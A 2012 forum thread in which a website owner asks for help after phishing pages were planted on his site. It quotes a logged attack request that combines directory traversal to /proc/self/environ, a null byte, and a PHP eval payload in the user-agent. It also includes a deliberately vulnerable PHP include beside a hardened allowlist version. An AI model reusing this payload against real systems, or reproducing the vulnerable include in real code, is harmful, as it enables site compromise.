Linux.com

My site has been used for Phishing

Link to this post 09 Jan 12

Help please,

I have a website that someone has been able to hack and install phishing pages!

I need to set the security to make this impossible. Looking back in the logs I found this code snippet:

"GET /index.php?page=latestnews//conlib/prepend.php3?cfg[path][contenido]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6578 "-" "<?eval(base64_decode('

After the page=latestnews there is a reference to conlib/prepend?cfg[path][contenido] which appears to install a page on the root directory from which they seem to be able to install phishing sites.

I have several sites on a dedicated FastHosts server but only 1 is being attacked?

Has anyone come across this and can recommend what to do?

Thanks

Mark

Link to this post 10 Jan 12

That looks like an SQL injection...

parametrize your queries

Regards

Link to this post 10 Jan 12

Hi marc,

I've been through the database and it doesn't appear to be an SQL injection.

More like an attack through Contenido CMS which we are not using but maybe installed as standard by FastHosts.

But, I can't find out how to disable this?

My main goal is to be able to tell FastHosts that the site cannot be attacked in this way again.

Thanks

Link to this post 10 Jan 12

Well, it's not an *SQL* injection but it's an *injection* after all. Your PHP code allows any parameter and the proof is: "../../../../../../../../../../../../.."

Your security problem is there ;)

Regards

Link to this post 11 Jan 12

1. Don't allow any input beyond specific formats.
2. For database I/O, DO NOT USE SQL in your forms - use stored procedures that do not take arguments as partial sql strings, but are only data passed in bound variables.
3. For all other input data, validate EVERYTHING.

It's not impossible to secure a web site from hacking, but it takes time and effort. If you don't want to invest in security, you will continue to be insecure.
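To make point 1 concrete for the request in the log, here is an added example (not code from this thread or from Contenido): a PHP include driven straight by a request parameter, beside a version that maps the parameter onto a fixed allowlist and checks the resolved path. The page names and the `pages/` directory are hypothetical.

```php
<?php
// Added example, not code from the thread. Shows the class of bug behind the
// logged request: a request parameter flows into include() unchecked.

// VULNERABLE pattern (do not use): the attacker's value becomes the include path.
// "../../../../../../proc/self/environ%00" walks out of the web root, and on
// older PHP builds the NUL byte truncated the ".php" appended here.
function vulnerable_include(string $page): void {
    include $page . '.php';
}

// HARDENED: the request value is only ever a lookup key into a fixed allowlist;
// request data never becomes part of a filesystem path.
const PAGES = [
    'home'       => 'pages/home.php',
    'latestnews' => 'pages/latestnews.php',
];

function safe_include(string $page): bool {
    if (!array_key_exists($page, PAGES)) {
        return false;                 // unknown page name: refuse and log it
    }
    $base = realpath(__DIR__);
    $file = realpath($base . DIRECTORY_SEPARATOR . PAGES[$page]);
    // Belt and braces: the resolved file must still sit below this directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    include $file;
    return true;
}

$page = $_GET['page'] ?? 'home';
if (!safe_include($page)) {
    http_response_code(404);
    echo 'Not found';
}
```

Rejected page names are worth logging: a spike of unknown values on the `page` parameter is exactly what the traversal attempt above looks like before it succeeds.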
